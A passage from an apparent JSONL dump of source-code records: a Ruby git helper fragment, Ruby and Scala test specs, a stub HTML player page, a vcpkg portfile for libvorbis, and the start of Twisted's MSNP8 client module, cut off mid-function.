'%H'\n string = last_git_commit_formatted_with(format_specifier).to_s\n return string unless string.empty?\n return nil\n end\n\n # Returns the current git branch - can be replaced using the environment variable `GIT_BRANCH`\n def self.git_branch\n return ENV['GIT_BRANCH'] if ENV['GIT_BRANCH'].to_s.length > 0 # set by Jenkins\n s = Actions.sh(\"git rev-parse --abbrev-ref HEAD\", log: false).chomp\n return s.to_s.strip if s.to_s.length > 0\n nil\n rescue\n nil\n end\n\n private_class_method\n def self.git_log_merge_commit_filtering_option(merge_commit_filtering)\n case merge_commit_filtering\n when :exclude_merges\n \"--no-merges\"\n when :only_include_merges\n \"--merges\"\n when :include_merges\n nil\n end\n end\n end\nend\n"} {"text": "# -*- coding: utf-8 -*-\nrequire File.dirname(__FILE__) + '/../../spec_helper'\nrequire 'mspec/runner/formatters/junit'\nrequire 'mspec/runner/example'\n\ndescribe JUnitFormatter, \"#initialize\" do\n it \"permits zero arguments\" do\n lambda { JUnitFormatter.new }.should_not raise_error\n end\n\n it \"accepts one argument\" do\n lambda { JUnitFormatter.new nil }.should_not raise_error\n end\nend\n\ndescribe JUnitFormatter, \"#print\" do\n before :each do\n $stdout = IOStub.new\n @out = IOStub.new\n File.stub(:open).and_return(@out)\n @formatter = JUnitFormatter.new \"some/file\"\n end\n\n after :each do\n $stdout = STDOUT\n end\n\n it \"writes to $stdout if #switch has not been called\" do\n @formatter.print \"begonias\"\n $stdout.should == \"begonias\"\n @out.should == \"\"\n end\n\n it \"writes to the file passed to #initialize once #switch has been called\" do\n @formatter.switch\n @formatter.print \"begonias\"\n $stdout.should == \"\"\n @out.should == \"begonias\"\n end\n\n it \"writes to $stdout once #switch is called if no file was passed to #initialize\" do\n formatter = JUnitFormatter.new\n formatter.switch\n formatter.print \"begonias\"\n $stdout.should == \"begonias\"\n @out.should == \"\"\n end\nend\n\ndescribe JUnitFormatter, \"#finish\" do\n before :each do\n @tally = double(\"tally\").as_null_object\n @counter = double(\"counter\").as_null_object\n @tally.stub(:counter).and_return(@counter)\n TallyAction.stub(:new).and_return(@tally)\n\n @timer = double(\"timer\").as_null_object\n TimerAction.stub(:new).and_return(@timer)\n\n $stdout = IOStub.new\n context = ContextState.new \"describe\"\n @state = ExampleState.new(context, \"it\")\n\n @formatter = JUnitFormatter.new\n @formatter.stub(:backtrace).and_return(\"\")\n MSpec.stub(:register)\n @formatter.register\n\n exc = ExceptionState.new @state, nil, MSpecExampleError.new(\"broken\")\n exc.stub(:backtrace).and_return(\"path/to/some/file.rb:35:in method\")\n @formatter.exception exc\n @formatter.after @state\n end\n\n after :each do\n $stdout = STDOUT\n end\n\n it \"calls #switch\" do\n @formatter.should_receive(:switch)\n @formatter.finish\n end\n\n it \"outputs a failure message and backtrace\" do\n @formatter.finish\n $stdout.should include 'message=\"error in describe it\" type=\"error\"'\n $stdout.should include \"MSpecExampleError: broken\\n\"\n $stdout.should include \"path/to/some/file.rb:35:in method\"\n end\n\n it \"encodes message and backtrace in latin1 for jenkins\" do\n exc = ExceptionState.new @state, nil, MSpecExampleError.new(\"broken…\")\n exc.stub(:backtrace).and_return(\"path/to/some/file.rb:35:in methød\")\n @formatter.exception exc\n @formatter.finish\n $stdout.should =~ /MSpecExampleError: broken((\\.\\.\\.)|\\?)\\n/\n $stdout.should =~ /path\\/to\\/some\\/file\\.rb:35:in meth(\\?|o)d/\n end\n\n it \"outputs an elapsed time\" do\n @timer.should_receive(:elapsed).and_return(4.2)\n @formatter.finish\n $stdout.should include 'time=\"4.2\"'\n end\n\n it \"outputs overall elapsed time\" do\n @timer.should_receive(:elapsed).and_return(4.2)\n @formatter.finish\n $stdout.should include 'timeCount=\"4.2\"'\n end\n\n it \"outputs the number of examples as test count\" do\n @counter.should_receive(:examples).and_return(9)\n @formatter.finish\n $stdout.should include 'tests=\"9\"'\n end\n\n it \"outputs overall number of examples as test count\" do\n @counter.should_receive(:examples).and_return(9)\n @formatter.finish\n $stdout.should include 'testCount=\"9\"'\n end\n\n it \"outputs a failure count\" do\n @counter.should_receive(:failures).and_return(2)\n @formatter.finish\n $stdout.should include 'failureCount=\"2\"'\n end\n\n it \"outputs overall failure count\" do\n @counter.should_receive(:failures).and_return(2)\n @formatter.finish\n $stdout.should include 'failures=\"2\"'\n end\n\n it \"outputs an error count\" do\n @counter.should_receive(:errors).and_return(1)\n @formatter.finish\n $stdout.should include 'errors=\"1\"'\n end\n\n it \"outputs overall error count\" do\n @counter.should_receive(:errors).and_return(1)\n @formatter.finish\n $stdout.should include 'errorCount=\"1\"'\n end\nend\n"} {"text": "/*\n * Copyright (C) 2016 Lightbend Inc. \n */\n\npackage akka.stream.contrib\n\nimport akka.actor.ActorSystem\nimport akka.pattern.after\nimport akka.stream.ActorMaterializer\nimport akka.stream.contrib.SwitchMode.{Close, Open}\nimport akka.stream.scaladsl.{Keep, Sink, Source}\nimport akka.stream.testkit.scaladsl._\nimport org.scalatest._\nimport org.scalatest.Matchers._\nimport org.scalatest.concurrent.ScalaFutures\nimport scala.language.postfixOps\n\nimport scala.concurrent.duration._\n\nclass ValveSpec extends WordSpec with ScalaFutures {\n\n implicit val system = ActorSystem()\n implicit val materializer = ActorMaterializer()\n implicit val executionContext = materializer.executionContext\n\n \"A closed valve\" should {\n\n \"emit only 3 elements into a sequence when the valve is switched to open\" in {\n\n val (switchFut, seq) = Source(1 to 3)\n .viaMat(new Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n after(100 millis, system.scheduler) {\n switch.flip(Open)\n }.futureValue shouldBe true\n\n seq.futureValue should contain inOrder (1, 2, 3)\n }\n }\n\n \"emit only 5 elements when the valve is switched to open\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(new Valve(SwitchMode.Close))(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n probe.request(2)\n probe.expectNoMsg(100 millis)\n\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n\n probe.expectNext shouldBe 1\n probe.expectNext shouldBe 2\n\n probe.request(3)\n probe.expectNext shouldBe 3\n probe.expectNext shouldBe 4\n probe.expectNext shouldBe 5\n\n probe.expectComplete()\n }\n }\n\n \"emit only 3 elements when the valve is switch to open/close/open\" in {\n val ((sourceProbe, switchFut), sinkProbe) = TestSource\n .probe[Int]\n .viaMat(Valve())(Keep.both)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n sinkProbe.request(1)\n whenReady(switch.flip(Close)) {\n _ shouldBe true\n }\n sourceProbe.sendNext(1)\n sinkProbe.expectNoMsg(100 millis)\n\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n sinkProbe.expectNext shouldEqual 1\n\n whenReady(switch.flip(Close)) {\n _ shouldBe true\n }\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n sinkProbe.expectNoMsg(100 millis)\n\n sinkProbe.request(1)\n sinkProbe.request(1)\n sourceProbe.sendNext(2)\n sourceProbe.sendNext(3)\n sourceProbe.sendComplete()\n\n sinkProbe.expectNext shouldBe 2\n sinkProbe.expectNext shouldBe 3\n\n sinkProbe.expectComplete()\n }\n }\n\n \"return false when the valve is already closed\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve(SwitchMode.Close))(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n whenReady(switch.flip(Close)) { element =>\n element should be(false)\n }\n whenReady(switch.flip(Close)) { element =>\n element should be(false)\n }\n }\n }\n\n \"emit nothing when the source is empty\" in {\n val (switch, seq) = Source.empty\n .viaMat(Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq, timeout(200 millis)) {\n _ shouldBe empty\n }\n }\n\n \"emit nothing when the source is failing\" in {\n val (switch, seq) = Source\n .failed(new IllegalArgumentException(\"Fake exception\"))\n .viaMat(Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq.failed) { e =>\n e shouldBe an[IllegalArgumentException]\n }\n }\n\n \"not pull elements again when opened and closed and re-opened\" in {\n\n val (probe, switchFut, resultFuture) = TestSource\n .probe[Int]\n .viaMat(Valve(SwitchMode.Close))(Keep.both)\n .toMat(Sink.head)((l, r) => (l._1, l._2, r))\n .run()\n\n whenReady(switchFut) { switch =>\n val result = for {\n _ <- switch.flip(SwitchMode.Open)\n _ <- switch.flip(SwitchMode.Close)\n _ <- switch.flip(SwitchMode.Open)\n _ = probe.sendNext(1)\n _ = probe.sendComplete()\n r <- resultFuture\n } yield r\n\n whenReady(result) {\n _ shouldBe 1\n }\n }\n }\n\n \"be in closed state\" in {\n val (switchFut, seq) = Source(1 to 3)\n .viaMat(new Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n whenReady(switch.getMode()) {\n _ shouldBe Close\n }\n }\n }\n\n }\n\n \"A opened valve\" should {\n\n \"emit 5 elements after it has been close/open\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve())(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n probe.request(2)\n probe.expectNext() shouldBe 1\n probe.expectNext() shouldBe 2\n\n whenReady(switch.flip(Close)) {\n _ shouldBe true\n }\n\n probe.request(1)\n probe.expectNoMsg(100 millis)\n\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n probe.expectNext() shouldBe 3\n\n probe.request(2)\n probe.expectNext() shouldBe 4\n probe.expectNext() shouldBe 5\n\n probe.expectComplete()\n }\n }\n\n \"return false when the valve is already opened\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve())(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n whenReady(switch.flip(Open)) {\n _ shouldBe false\n }\n whenReady(switch.flip(Open)) {\n _ shouldBe false\n }\n }\n }\n\n \"emit only 3 elements into a sequence\" in {\n\n val (switch, seq) = Source(1 to 3)\n .viaMat(Valve())(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq, timeout(200 millis)) {\n _ should contain inOrder (1, 2, 3)\n }\n }\n\n \"emit nothing when the source is empty\" in {\n val (switch, seq) = Source.empty\n .viaMat(Valve())(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq, timeout(200 millis)) {\n _ shouldBe empty\n }\n\n }\n\n \"emit nothing when the source is failing\" in {\n val (switch, seq) = Source\n .failed(new IllegalArgumentException(\"Fake exception\"))\n .viaMat(Valve())(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq.failed) { e =>\n e shouldBe an[IllegalArgumentException]\n }\n }\n\n \"not pull elements again when closed and re-opened\" in {\n\n val (probe, switchFut, resultFuture) = TestSource\n .probe[Int]\n .viaMat(Valve())(Keep.both)\n .toMat(Sink.head)((l, r) => (l._1, l._2, r))\n .run()\n\n whenReady(switchFut) { switch =>\n val result = for {\n _ <- switch.flip(SwitchMode.Close)\n _ <- switch.flip(SwitchMode.Open)\n _ = probe.sendNext(1)\n _ = probe.sendComplete()\n r <- resultFuture\n } yield r\n\n whenReady(result) {\n _ shouldBe 1\n }\n }\n }\n\n \"be in open state\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve())(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n whenReady(switchFut) { switch =>\n whenReady(switch.getMode()) {\n _ shouldBe Open\n }\n }\n }\n\n }\n}\n"} {"text": "\n\n\n\t\n\t\n\t\n\tSewise Player\n\n\n\t
\n\t\t\n\t\t\n\t
\n\t\n\n"} {"text": "vcpkg_from_github(\n OUT_SOURCE_PATH SOURCE_PATH\n REPO xiph/vorbis\n REF v1.3.7\n SHA512 bfb6f5dbfd49ed38b2b08b3667c06d02e68f649068a050f21a3cc7e1e56b27afd546aaa3199c4f6448f03f6e66a82f9a9dc2241c826d3d1d4acbd38339b9e9fb\n HEAD_REF master\n PATCHES\n 0001-Dont-export-vorbisenc-functions.patch\n)\n\nvcpkg_configure_cmake(\n SOURCE_PATH ${SOURCE_PATH}\n PREFER_NINJA\n)\n\nvcpkg_install_cmake()\nvcpkg_fixup_cmake_targets(\n CONFIG_PATH lib/cmake/Vorbis\n TARGET_PATH share/Vorbis\n)\n\nfile(REMOVE_RECURSE ${CURRENT_PACKAGES_DIR}/debug/include)\n\n# Handle copyright\nconfigure_file(${SOURCE_PATH}/COPYING ${CURRENT_PACKAGES_DIR}/share/${PORT}/copyright COPYONLY)\n\nvcpkg_copy_pdbs()\n\nif(WIN32 AND (NOT MINGW))\n vcpkg_replace_string(\"${CURRENT_PACKAGES_DIR}/debug/lib/pkgconfig/vorbis.pc\" \"-lm\" \"\")\n vcpkg_replace_string(\"${CURRENT_PACKAGES_DIR}/lib/pkgconfig/vorbis.pc\" \"-lm\" \"\")\nendif()\nvcpkg_fixup_pkgconfig()\n"} {"text": "# -*- test-case-name: twisted.words.test -*-\n# Copyright (c) Twisted Matrix Laboratories.\n# See LICENSE for details.\n\n\"\"\"\nMSNP8 Protocol (client only) - semi-experimental\n\nThis module provides support for clients using the MSN Protocol (MSNP8).\nThere are basically 3 servers involved in any MSN session:\n\nI{Dispatch server}\n\nThe DispatchClient class handles connections to the\ndispatch server, which basically delegates users to a\nsuitable notification server.\n\nYou will want to subclass this and handle the gotNotificationReferral\nmethod appropriately.\n\nI{Notification Server}\n\nThe NotificationClient class handles connections to the\nnotification server, which acts as a session server\n(state updates, message negotiation etc...)\n\nI{Switcboard Server}\n\nThe SwitchboardClient handles connections to switchboard\nservers which are used to conduct conversations with other users.\n\nThere are also two classes (FileSend and FileReceive) used\nfor file transfers.\n\nClients handle events in two ways.\n\n - each client request requiring a response will return a Deferred,\n the callback for same will be fired when the server sends the\n required response\n - Events which are not in response to any client request have\n respective methods which should be overridden and handled in\n an adequate manner\n\nMost client request callbacks require more than one argument,\nand since Deferreds can only pass the callback one result,\nmost of the time the callback argument will be a tuple of\nvalues (documented in the respective request method).\nTo make reading/writing code easier, callbacks can be defined in\na number of ways to handle this 'cleanly'. One way would be to\ndefine methods like: def callBack(self, (arg1, arg2, arg)): ...\nanother way would be to do something like:\nd.addCallback(lambda result: myCallback(*result)).\n\nIf the server sends an error response to a client request,\nthe errback of the corresponding Deferred will be called,\nthe argument being the corresponding error code.\n\nB{NOTE}:\nDue to the lack of an official spec for MSNP8, extra checking\nthan may be deemed necessary often takes place considering the\nserver is never 'wrong'. Thus, if gotBadLine (in any of the 3\nmain clients) is called, or an MSNProtocolError is raised, it's\nprobably a good idea to submit a bug report. ;)\nUse of this module requires that PyOpenSSL is installed.\n\nTODO\n====\n- check message hooks with invalid x-msgsinvite messages.\n- font handling\n- switchboard factory\n\n@author: Sam Jordan\n\"\"\"\n\nimport types, operator, os\nfrom random import randint\nfrom urllib import quote, unquote\n\nfrom twisted.python import failure, log\nfrom twisted.python.hashlib import md5\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import Deferred, execute\nfrom twisted.internet.protocol import ClientFactory\ntry:\n from twisted.internet.ssl import ClientContextFactory\nexcept ImportError:\n ClientContextFactory = None\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.web.http import HTTPClient\n\n\nMSN_PROTOCOL_VERSION = \"MSNP8 CVR0\" # protocol version\nMSN_PORT = 1863 # default dispatch server port\nMSN_MAX_MESSAGE = 1664 # max message length\nMSN_CHALLENGE_STR = \"Q1P7W2E4J9R8U3S5\" # used for server challenges\nMSN_CVR_STR = \"0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS\" # :(\n\n# auth constants\nLOGIN_SUCCESS = 1\nLOGIN_FAILURE = 2\nLOGIN_REDIRECT = 3\n\n# list constants\nFORWARD_LIST = 1\nALLOW_LIST = 2\nBLOCK_LIST = 4\nREVERSE_LIST = 8\n\n# phone constants\nHOME_PHONE = \"PHH\"\nWORK_PHONE = \"PHW\"\nMOBILE_PHONE = \"PHM\"\nHAS_PAGER = \"MOB\"\n\n# status constants\nSTATUS_ONLINE = 'NLN'\nSTATUS_OFFLINE = 'FLN'\nSTATUS_HIDDEN = 'HDN'\nSTATUS_IDLE = 'IDL'\nSTATUS_AWAY = 'AWY'\nSTATUS_BUSY = 'BSY'\nSTATUS_BRB = 'BRB'\nSTATUS_PHONE = 'PHN'\nSTATUS_LUNCH = 'LUN'\n\nCR = \"\\r\"\nLF = \"\\n\"\n\n\nclass SSLRequired(Exception):\n \"\"\"\n This exception is raised when it is necessary to talk to a passport server\n using SSL, but the necessary SSL dependencies are unavailable.\n\n @since: 11.0\n \"\"\"\n\n\n\ndef checkParamLen(num, expected, cmd, error=None):\n if error == None:\n error = \"Invalid Number of Parameters for %s\" % cmd\n if num != expected:\n raise MSNProtocolError, error\n\ndef _parseHeader(h, v):\n \"\"\"\n Split a certin number of known\n header values with the format:\n field1=val,field2=val,field3=val into\n a dict mapping fields to values.\n @param h: the header's key\n @param v: the header's value as a string\n \"\"\"\n\n if h in ('passporturls','authentication-info','www-authenticate'):\n v = v.replace('Passport1.4','').lstrip()\n fields = {}\n for fieldPair in v.split(','):\n try:\n field,value = fieldPair.split('=',1)\n fields[field.lower()] = value\n except ValueError:\n fields[field.lower()] = ''\n return fields\n else:\n return v\n\ndef _parsePrimitiveHost(host):\n # Ho Ho Ho\n h,p = host.replace('https://','').split('/',1)\n p = '/' + p\n return h,p\n\n\ndef _login(userHandle, passwd, nexusServer, cached=0, authData=''):\n \"\"\"\n This function is used internally and should not ever be called\n directly.\n\n @raise SSLRequired: If there is no SSL support available.\n \"\"\"\n if ClientContextFactory is None:\n raise SSLRequired(\n 'Connecting to the Passport server requires SSL, but SSL is '\n 'unavailable.')\n\n cb = Deferred()\n def _cb(server, auth):\n loginFac = ClientFactory()\n loginFac.protocol = lambda : PassportLogin(cb, userHandle, passwd, server, auth)\n reactor.connectSSL(_parsePrimitiveHost(server)[0], 443, loginFac, ClientContextFactory())\n\n if cached:\n _cb(nexusServer, authData)\n else:\n fac = ClientFactory()\n d = Deferred()\n d.addCallbacks(_cb, callbackArgs=(authData,))\n d.addErrback(lambda f: cb.errback(f))\n fac.protocol = lambda : PassportNexus(d, nexusServer)\n reactor.connectSSL(_parsePrimitiveHost(nexusServer)[0], 443, fac, ClientContextFactory())\n return cb\n\n\nclass PassportNexus(HTTPClient):\n\n \"\"\"\n Used to obtain the URL of a valid passport\n login HTTPS server.\n\n This class is used internally and should\n not be instantiated directly -- that is,\n The passport logging in process is handled\n transparantly by NotificationClient.\n \"\"\"\n\n def __init__(self, deferred, host):\n self.deferred = deferred\n self.host, self.path = _parsePrimitiveHost(host)\n\n def connectionMade(self):\n HTTPClient.connectionMade(self)\n self.sendCommand('GET', self.path)\n self.sendHeader('Host', self.host)\n self.endHeaders()\n self.headers = {}\n\n def handleHeader(self, header, value):\n h = header.lower()\n self.headers[h] = _parseHeader(h, value)\n\n def handleEndHeaders(self):\n if self.connected:\n self.transport.loseConnection()\n if not self.headers.has_key('passporturls') or not self.headers['passporturls'].has_key('dalogin'):\n self.deferred.errback(failure.Failure(failure.DefaultException(\"Invalid Nexus Reply\")))\n self.deferred.callback('https://' + self.headers['passporturls']['dalogin'])\n\n def handleResponse(self, r):\n pass\n\nclass PassportLogin(HTTPClient):\n \"\"\"\n This class is used internally to obtain\n a login ticket from a passport HTTPS\n server -- it should not be used directly.\n \"\"\"\n\n _finished = 0\n\n def __init__(self, deferred, userHandle, passwd, host, authData):\n self.deferred = deferred\n self.userHandle = userHandle\n self.passwd = passwd\n self.authData = authData\n self.host, self.path = _parsePrimitiveHost(host)\n\n def connectionMade(self):\n self.sendCommand('GET', self.path)\n self.sendHeader('Authorization', 'Passport1.4 OrgVerb=GET,OrgURL=http://messenger.msn.com,' +\n 'sign-in=%s,pwd=%s,%s' % (quote(self.userHandle), self.passwd,self.authData))\n self.sendHeader('Host', self.host)\n self.endHeaders()\n self.headers = {}\n\n def handleHeader(self, header, value):\n h = header.lower()\n self.headers[h] = _parseHeader(h, value)\n\n def handleEndHeaders(self):\n if self._finished:\n return\n self._finished = 1 # I think we need this because of HTTPClient\n if self.connected:\n self.transport.loseConnection()\n authHeader = 'authentication-info'\n _interHeader = 'www-authenticate'\n if self.headers.has_key(_interHeader):\n authHeader = _interHeader\n try:\n info = self.headers[authHeader]\n status = info['da-status']\n handler = getattr(self, 'login_%s' % (status,), None)\n if handler:\n handler(info)\n else:\n raise Exception()\n except Exception, e:\n self.deferred.errback(failure.Failure(e))\n\n def handleResponse(self, r):\n pass\n\n def login_success(self, info):\n ticket = info['from-pp']\n ticket = ticket[1:len(ticket)-1]\n self.deferred.callback((LOGIN_SUCCESS, ticket))\n\n def login_failed(self, info):\n self.deferred.callback((LOGIN_FAILURE, unquote(info['cbtxt'])))\n\n def login_redir(self, info):\n self.deferred.callback((LOGIN_REDIRECT, self.headers['location'], self.authData))\n\n\nclass MSNProtocolError(Exception):\n \"\"\"\n This Exception is basically used for debugging\n purposes, as the official MSN server should never\n send anything _wrong_ and nobody in their right\n mind would run their B{own} MSN server.\n If it is raised by default command handlers\n (handle_BLAH) the error will be logged.\n \"\"\"\n pass\n\n\nclass MSNCommandFailed(Exception):\n \"\"\"\n The server said that the command failed.\n \"\"\"\n\n def __init__(self, errorCode):\n self.errorCode = errorCode\n\n def __str__(self):\n return (\"Command failed: %s (error code %d)\"\n % (errorCodes[self.errorCode], self.errorCode))\n\n\nclass MSNMessage:\n \"\"\"\n I am the class used to represent an 'instant' message.\n\n @ivar userHandle: The user handle (passport) of the sender\n (this is only used when receiving a message)\n @ivar screenName: The screen name of the sender (this is only used\n when receiving a message)\n @ivar message: The message\n @ivar headers: The message headers\n @type headers: dict\n @ivar length: The message length (including headers and line endings)\n @ivar ack: This variable is used to tell the server how to respond\n once the message has been sent. If set to MESSAGE_ACK\n (default) the server will respond with an ACK upon receiving\n the message, if set to MESSAGE_NACK the server will respond\n with a NACK upon failure to receive the message.\n If set to MESSAGE_ACK_NONE the server will do nothing.\n This is relevant for the return value of\n SwitchboardClient.sendMessage (which will return\n a Deferred if ack is set to either MESSAGE_ACK or MESSAGE_NACK\n and will fire when the respective ACK or NACK is received).\n If set to MESSAGE_ACK_NONE sendMessage will return None.\n \"\"\"\n MESSAGE_ACK = 'A'\n MESSAGE_NACK = 'N'\n MESSAGE_ACK_NONE = 'U'\n\n ack = MESSAGE_ACK\n\n def __init__(self, length=0, userHandle=\"\", screenName=\"\", message=\"\"):\n self.userHandle = userHandle\n self.screenName = screenName\n self.message = message\n self.headers = {'MIME-Version' : '1.0', 'Content-Type' : 'text/plain'}\n self.length = length\n self.readPos = 0\n\n def _calcMessageLen(self):\n \"\"\"\n used to calculte the number to send\n as the message length when sending a message.\n \"\"\"\n return reduce(operator.add, [len(x[0]) + len(x[1]) + 4 for x in self.headers.items()]) + len(self.message) + 2\n\n def setHeader(self, header, value):\n \"\"\" set the desired header \"\"\"\n self.headers[header] = value\n\n def getHeader(self, header):\n \"\"\"\n get the desired header value\n @raise KeyError: if no such header exists.\n \"\"\"\n return self.headers[header]\n\n def hasHeader(self, header):\n \"\"\" check to see if the desired header exists \"\"\"\n return self.headers.has_key(header)\n\n def getMessage(self):\n \"\"\" return the message - not including headers \"\"\"\n return self.message\n\n def setMessage(self, message):\n \"\"\" set the message text \"\"\"\n self.message = message\n\nclass MSNContact:\n\n \"\"\"\n This class represents a contact (user).\n\n @ivar userHandle: The contact's user handle (passport).\n @ivar screenName: The contact's screen name.\n @ivar groups: A list of all the group IDs which this\n contact belongs to.\n @ivar lists: An integer representing the sum of all lists\n that this contact belongs to.\n @ivar status: The contact's status code.\n @type status: str if contact's status is known, None otherwise.\n\n @ivar homePhone: The contact's home phone number.\n @type homePhone: str if known, otherwise None.\n @ivar workPhone: The contact's work phone number.\n @type workPhone: str if known, otherwise None.\n @ivar mobilePhone: The contact's mobile phone number.\n @type mobilePhone: str if known, otherwise None.\n @ivar hasPager: Whether or not this user has a mobile pager\n (true=yes, false=no)\n \"\"\"\n\n def __init__(self, userHandle=\"\", screenName=\"\", lists=0, groups=[], status=None):\n self.userHandle = userHandle\n self.screenName = screenName\n self.lists = lists\n self.groups = [] # if applicable\n self.status = status # current status\n\n # phone details\n self.homePhone = None\n self.workPhone = None\n self.mobilePhone = None\n self.hasPager = None\n\n def setPhone(self, phoneType, value):\n \"\"\"\n set phone numbers/values for this specific user.\n for phoneType check the *_PHONE constants and HAS_PAGER\n \"\"\"\n\n t = phoneType.upper()\n if t == HOME_PHONE:\n self.homePhone = value\n elif t == WORK_PHONE:\n self.workPhone = value\n elif t == MOBILE_PHONE:\n self.mobilePhone = value\n elif t == HAS_PAGER:\n self.hasPager = value\n else:\n raise ValueError, \"Invalid Phone Type\"\n\n def addToList(self, listType):\n \"\"\"\n Update the lists attribute to\n reflect being part of the\n given list.\n \"\"\"\n self.lists |= listType\n\n def removeFromList(self, listType):\n \"\"\"\n Update the lists attribute to\n reflect being removed from the\n given list.\n \"\"\"\n self.lists ^= listType\n\nclass MSNContactList:\n \"\"\"\n This class represents a basic MSN contact list.\n\n @ivar contacts: All contacts on my various lists\n @type contacts: dict (mapping user handles to MSNContact objects)\n @ivar version: The current contact list version (used for list syncing)\n @ivar groups: a mapping of group ids to group names\n (groups can only exist on the forward list)\n @type groups: dict\n\n B{Note}:\n This is used only for storage and doesn't effect the\n server's contact list.\n \"\"\"\n\n def __init__(self):\n self.contacts = {}\n self.version = 0\n self.groups = {}\n self.autoAdd = 0\n self.privacy = 0\n\n def _getContactsFromList(self, listType):\n \"\"\"\n Obtain all contacts which belong\n to the given list type.\n \"\"\"\n return dict([(uH,obj) for uH,obj in self.contacts.items() if obj.lists & listType])\n\n def addContact(self, contact):\n \"\"\"\n Add a contact\n \"\"\"\n self.contacts[contact.userHandle] = contact\n\n def remContact(self, userHandle):\n \"\"\"\n Remove a contact\n \"\"\"\n try:\n del self.contacts[userHandle]\n except KeyError:\n pass\n\n def getContact(self, userHandle):\n \"\"\"\n Obtain the MSNContact object\n associated with the given\n userHandle.\n @return: the MSNContact object if\n the user exists, or None.\n \"\"\"\n try:\n return self.contacts[userHandle]\n except KeyError:\n return None\n\n def getBlockedContacts(self):\n \"\"\"\n Obtain all the contacts on my block list\n \"\"\"\n return self._getContactsFromList(BLOCK_LIST)\n\n def getAuthorizedContacts(self):\n \"\"\"\n Obtain all the contacts on my auth list.\n (These are contacts which I have verified\n can view my state changes).\n \"\"\"\n return self._getContactsFromList(ALLOW_LIST)\n\n def getReverseContacts(self):\n \"\"\"\n Get all contacts on my reverse list.\n (These are contacts which have added me\n to their forward list).\n \"\"\"\n return self._getContactsFromList(REVERSE_LIST)\n\n def getContacts(self):\n \"\"\"\n Get all contacts on my forward list.\n (These are the contacts which I have added\n to my list).\n \"\"\"\n return self._getContactsFromList(FORWARD_LIST)\n\n def setGroup(self, id, name):\n \"\"\"\n Keep a mapping from the given id\n to the given name.\n \"\"\"\n self.groups[id] = name\n\n def remGroup(self, id):\n \"\"\"\n Removed the stored group\n mapping for the given id.\n \"\"\"\n try:\n del self.groups[id]\n except KeyError:\n pass\n for c in self.contacts:\n if id in c.groups:\n c.groups.remove(id)\n\n\nclass MSNEventBase(LineReceiver):\n \"\"\"\n This class provides support for handling / dispatching events and is the\n base class of the three main client protocols (DispatchClient,\n NotificationClient, SwitchboardClient)\n \"\"\"\n\n def __init__(self):\n self.ids = {} # mapping of ids to Deferreds\n self.currentID = 0\n self.connected = 0\n self.setLineMode()\n self.currentMessage = None\n\n def connectionLost(self, reason):\n self.ids = {}\n self.connected = 0\n\n def connectionMade(self):\n self.connected = 1\n\n def _fireCallback(self, id, *args):\n \"\"\"\n Fire the callback for the given id\n if one exists and return 1, else return false\n \"\"\"\n if self.ids.has_key(id):\n self.ids[id][0].callback(args)\n del self.ids[id]\n return 1\n return 0\n\n def _nextTransactionID(self):\n \"\"\" return a usable transaction ID \"\"\"\n self.currentID += 1\n if self.currentID > 1000:\n self.currentID = 1\n return self.currentID\n\n def _createIDMapping(self, data=None):\n \"\"\"\n return a unique transaction ID that is mapped internally to a\n deferred .. also store arbitrary data if it is needed\n \"\"\"\n id = self._nextTransactionID()\n d = Deferred()\n self.ids[id] = (d, data)\n return (id, d)\n\n def checkMessage(self, message):\n \"\"\"\n process received messages to check for file invitations and\n typing notifications and other control type messages\n \"\"\"\n raise NotImplementedError\n\n def lineReceived(self, line):\n if self.currentMessage:\n self.currentMessage.readPos += len(line+CR+LF)\n if line == \"\":\n self.setRawMode()\n if self.currentMessage.readPos == self.currentMessage.length:\n self.rawDataReceived(\"\") # :(\n return\n try:\n header, value = line.split(':')\n except ValueError:\n raise MSNProtocolError, \"Invalid Message Header\"\n self.currentMessage.setHeader(header, unquote(value).lstrip())\n return\n try:\n cmd, params = line.split(' ', 1)\n except ValueError:\n raise MSNProtocolError, \"Invalid Message, %s\" % repr(line)\n\n if len(cmd) != 3:\n raise MSNProtocolError, \"Invalid Command, %s\" % repr(cmd)\n if cmd.isdigit():\n errorCode = int(cmd)\n id = int(params.split()[0])\n if id in self.ids:\n self.ids[id][0].errback(MSNCommandFailed(errorCode))\n del self.ids[id]\n return\n else: # we received an error which doesn't map to a sent command\n self.gotError(errorCode)\n return\n\n handler = getattr(self, \"handle_%s\" % cmd.upper(), None)\n if handler:\n try:\n handler(params.split())\n except MSNProtocolError, why:\n self.gotBadLine(line, why)\n else:\n self.handle_UNKNOWN(cmd, 